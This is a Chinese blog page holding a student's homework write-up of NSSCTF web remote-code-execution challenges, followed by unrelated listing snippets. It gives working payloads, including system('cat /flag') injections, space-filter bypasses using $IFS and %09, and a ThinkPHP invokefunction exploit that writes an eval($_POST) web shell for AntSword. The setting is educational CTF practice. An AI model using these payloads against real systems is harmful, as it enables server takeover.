news 2026/6/10 20:26:03

作业 web rce

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
作业 web rce

25计科秦欢

假期作业

[SWPUCTF 2021 新赛]easyrce

/?url=system(“ls /”); 列出根目录

/?url=system(“cat /flag”);

[SWPUCTF 2021 新生赛]babyrce

打开环境,有代码得,要在控制台中cookie添加一个应用程序

访问得到一个文件,/rasalghul.php接着访问,由代码得出要过滤空格,

?url=ls #列出根目录,

使用$IFS %09 过滤空格

[SWPUCTF 2021 新生赛]finalrce

打开环境发现过滤了很多字符,构建一个文件6.txt

/?url=l\s /|tee 6.txt

然后直接访问文件

要打开flag文件,使用/?url=tac /flllll\aaaaaaggggggg|tee 7.txt

然后直接访问7.txt文件

[SWPUCTF 2022 新生赛]ez_rce

打开环境,发现什么也没有,使用dirseach扫描,发现文件

接着访问文件,当访问到/robots.txt时,发现下面语句

接着访问/NSS/index.php ,要特别注意这里大小写不能错,否则访问不出来

接着搜索图上内容得到解决方法,

接着输入

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST[1]);?>
在输入上面字符

接下就要用到蚁剑了,连接到蚁剑

拿到flag

[SWPUCTF 2023 秋季新生赛]RCE-PLUS

打开环境,根据题目意思发现参数是cmd,使用http://node4.anna.nssctf.cn:28223/?cmd=ls%20/|tee%20a.txt

创建一个文件a.txt,然后访问

然后使用这个/?cmd=cat /f*|tee a.txt,再次访问得到flag

[NISACTF 2022]middlerce

这题使用的是正则匹配的NIF匹配引擎,这个匹配引擎的原理是基于从后往前回溯的匹配机制

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/6/10 12:55:08

SmartRename终极指南:快速掌握Windows批量重命名技巧

SmartRename终极指南&#xff1a;快速掌握Windows批量重命名技巧 【免费下载链接】SmartRename A Windows Shell Extension for more advanced bulk renaming using search and replace or regular expressions 项目地址: https://gitcode.com/gh_mirrors/smar/SmartRename …

作者头像 李华
网站建设 2026/6/10 12:53:22

机器学习资源宝库:7大编程语言下的必备工具集

机器学习资源宝库&#xff1a;7大编程语言下的必备工具集 【免费下载链接】awesome-machine-learning josephmisiti/awesome-machine-learning: 一个包含各种机器学习和深度学习资源的列表&#xff0c;包括算法、工具和库等。适合机器学习和深度学习开发者参考和使用&#xff0…

作者头像 李华
网站建设 2026/6/10 12:53:29

DeepSeek-OCR批量处理教程:企业级文档电子化系统搭建

DeepSeek-OCR批量处理教程&#xff1a;企业级文档电子化系统搭建 1. 引言 1.1 业务场景描述 在现代企业运营中&#xff0c;大量纸质文档&#xff08;如合同、发票、档案、申请表&#xff09;仍广泛存在&#xff0c;传统的人工录入方式不仅效率低下&#xff0c;且容易出错。随…

作者头像 李华
网站建设 2026/6/10 12:53:14

TensorFlow-v2.15 GPU加速秘籍:1小时1块极致性价比

TensorFlow-v2.15 GPU加速秘籍&#xff1a;1小时1块极致性价比 你是不是也遇到过这种情况&#xff1a;接了个AI项目&#xff0c;客户预算紧张&#xff0c;但模型训练又特别吃算力&#xff1f;作为自由职业者&#xff0c;租高端GPU按小时计费&#xff0c;钱包根本扛不住。别急—…

作者头像 李华
网站建设 2026/6/10 13:01:26

如何快速上手Ego4D:新手必看的完整使用指南

如何快速上手Ego4D&#xff1a;新手必看的完整使用指南 【免费下载链接】Ego4d Ego4d dataset repository. Download the dataset, visualize, extract features & example usage of the dataset 项目地址: https://gitcode.com/gh_mirrors/eg/Ego4d 第一人称视频数…

作者头像 李华
网站建设 2026/6/10 3:49:27

Qwen3-4B性能实测报告:A17 Pro上30 tokens/s的优化秘诀

Qwen3-4B性能实测报告&#xff1a;A17 Pro上30 tokens/s的优化秘诀 1. 引言 随着大模型向端侧部署加速演进&#xff0c;如何在资源受限设备上实现高性能推理成为AI工程落地的关键挑战。通义千问 3-4B-Instruct-2507&#xff08;Qwen3-4B-Instruct-2507&#xff09;作为阿里于…

作者头像 李华